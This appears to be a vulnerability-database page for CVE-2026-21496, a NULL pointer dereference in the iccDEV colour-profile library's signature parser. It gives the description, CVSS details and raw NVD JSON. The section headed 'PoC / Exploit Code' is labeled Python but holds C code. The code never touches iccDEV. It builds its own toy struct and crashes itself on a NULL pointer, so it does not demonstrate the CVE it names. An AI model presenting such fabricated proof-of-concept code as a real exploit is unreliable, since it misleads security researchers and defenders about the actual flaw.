Security Vulnerability Report
中文
CVE-2026-21496 CVSS 5.5 MEDIUM

CVE-2026-21496

Published: 2026-01-07 18:15:53
Last Modified: 2026-01-09 21:56:49
Source: [email protected]

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21496 PoC - NULL Pointer Dereference in iccDEV Signature Parser // This PoC demonstrates the vulnerability by triggering NULL pointer dereference // Author: Security Researcher // Date: 2026-01-07 #include <stdio.h> #include <stdlib.h> #include <string.h> // Simulated ICC signature structure typedef struct { char signature[4]; void* next_tag; // NULL pointer triggers vulnerability } ICC_SignatureTag; // Vulnerable function - signature parser void parse_icc_signature(ICC_SignatureTag* tag) { // Check if signature matches expected value if (memcmp(tag->signature, "sf32", 4) == 0) { // VULNERABLE: Dereferencing potentially NULL pointer without check printf("Processing tag: %s\n", tag->signature); // This will cause NULL pointer dereference if next_tag is NULL int result = ((ICC_SignatureTag*)tag->next_tag)->signature[0]; printf("Next tag signature: %c\n", result); } } // Function to create malicious ICC profile ICC_SignatureTag* create_malicious_tag() { ICC_SignatureTag* tag = (ICC_SignatureTag*)malloc(sizeof(ICC_SignatureTag)); if (tag == NULL) { return NULL; } // Set malicious signature memcpy(tag->signature, "sf32", 4); // Set next_tag to NULL - triggers vulnerability tag->next_tag = NULL; return tag; } int main() { printf("CVE-2026-21496 PoC - iccDEV NULL Pointer Dereference\n"); printf("===================================================\n\n"); // Create malicious tag ICC_SignatureTag* malicious_tag = create_malicious_tag(); if (malicious_tag != NULL) { printf("Created malicious ICC signature tag\n"); printf("Signature: %.4s\n", malicious_tag->signature); printf("next_tag pointer: %p (NULL)\n\n", malicious_tag->next_tag); // Trigger vulnerability printf("Attempting to parse malicious tag...\n"); parse_icc_signature(malicious_tag); free(malicious_tag); } return 0; } // Usage: // Compile: gcc -o poc poc.c // Run: ./poc // Expected Result: Segmentation fault (NULL pointer dereference)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21496", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:53.300", "lastModified": "2026-01-09T21:56:48.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color ICC. Antes de la versión 2.3.1.2, iccDEV es vulnerable a una desreferencia de puntero nulo a través del analizador de firmas. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-690"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/0e51ceb427925b7e22f0465547df7506d35cda1c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/b5ad23aceece3789bdf1c47bae1ecf9d7bfcd26d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/381", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/405", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wj8m-6w77-r4rw", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.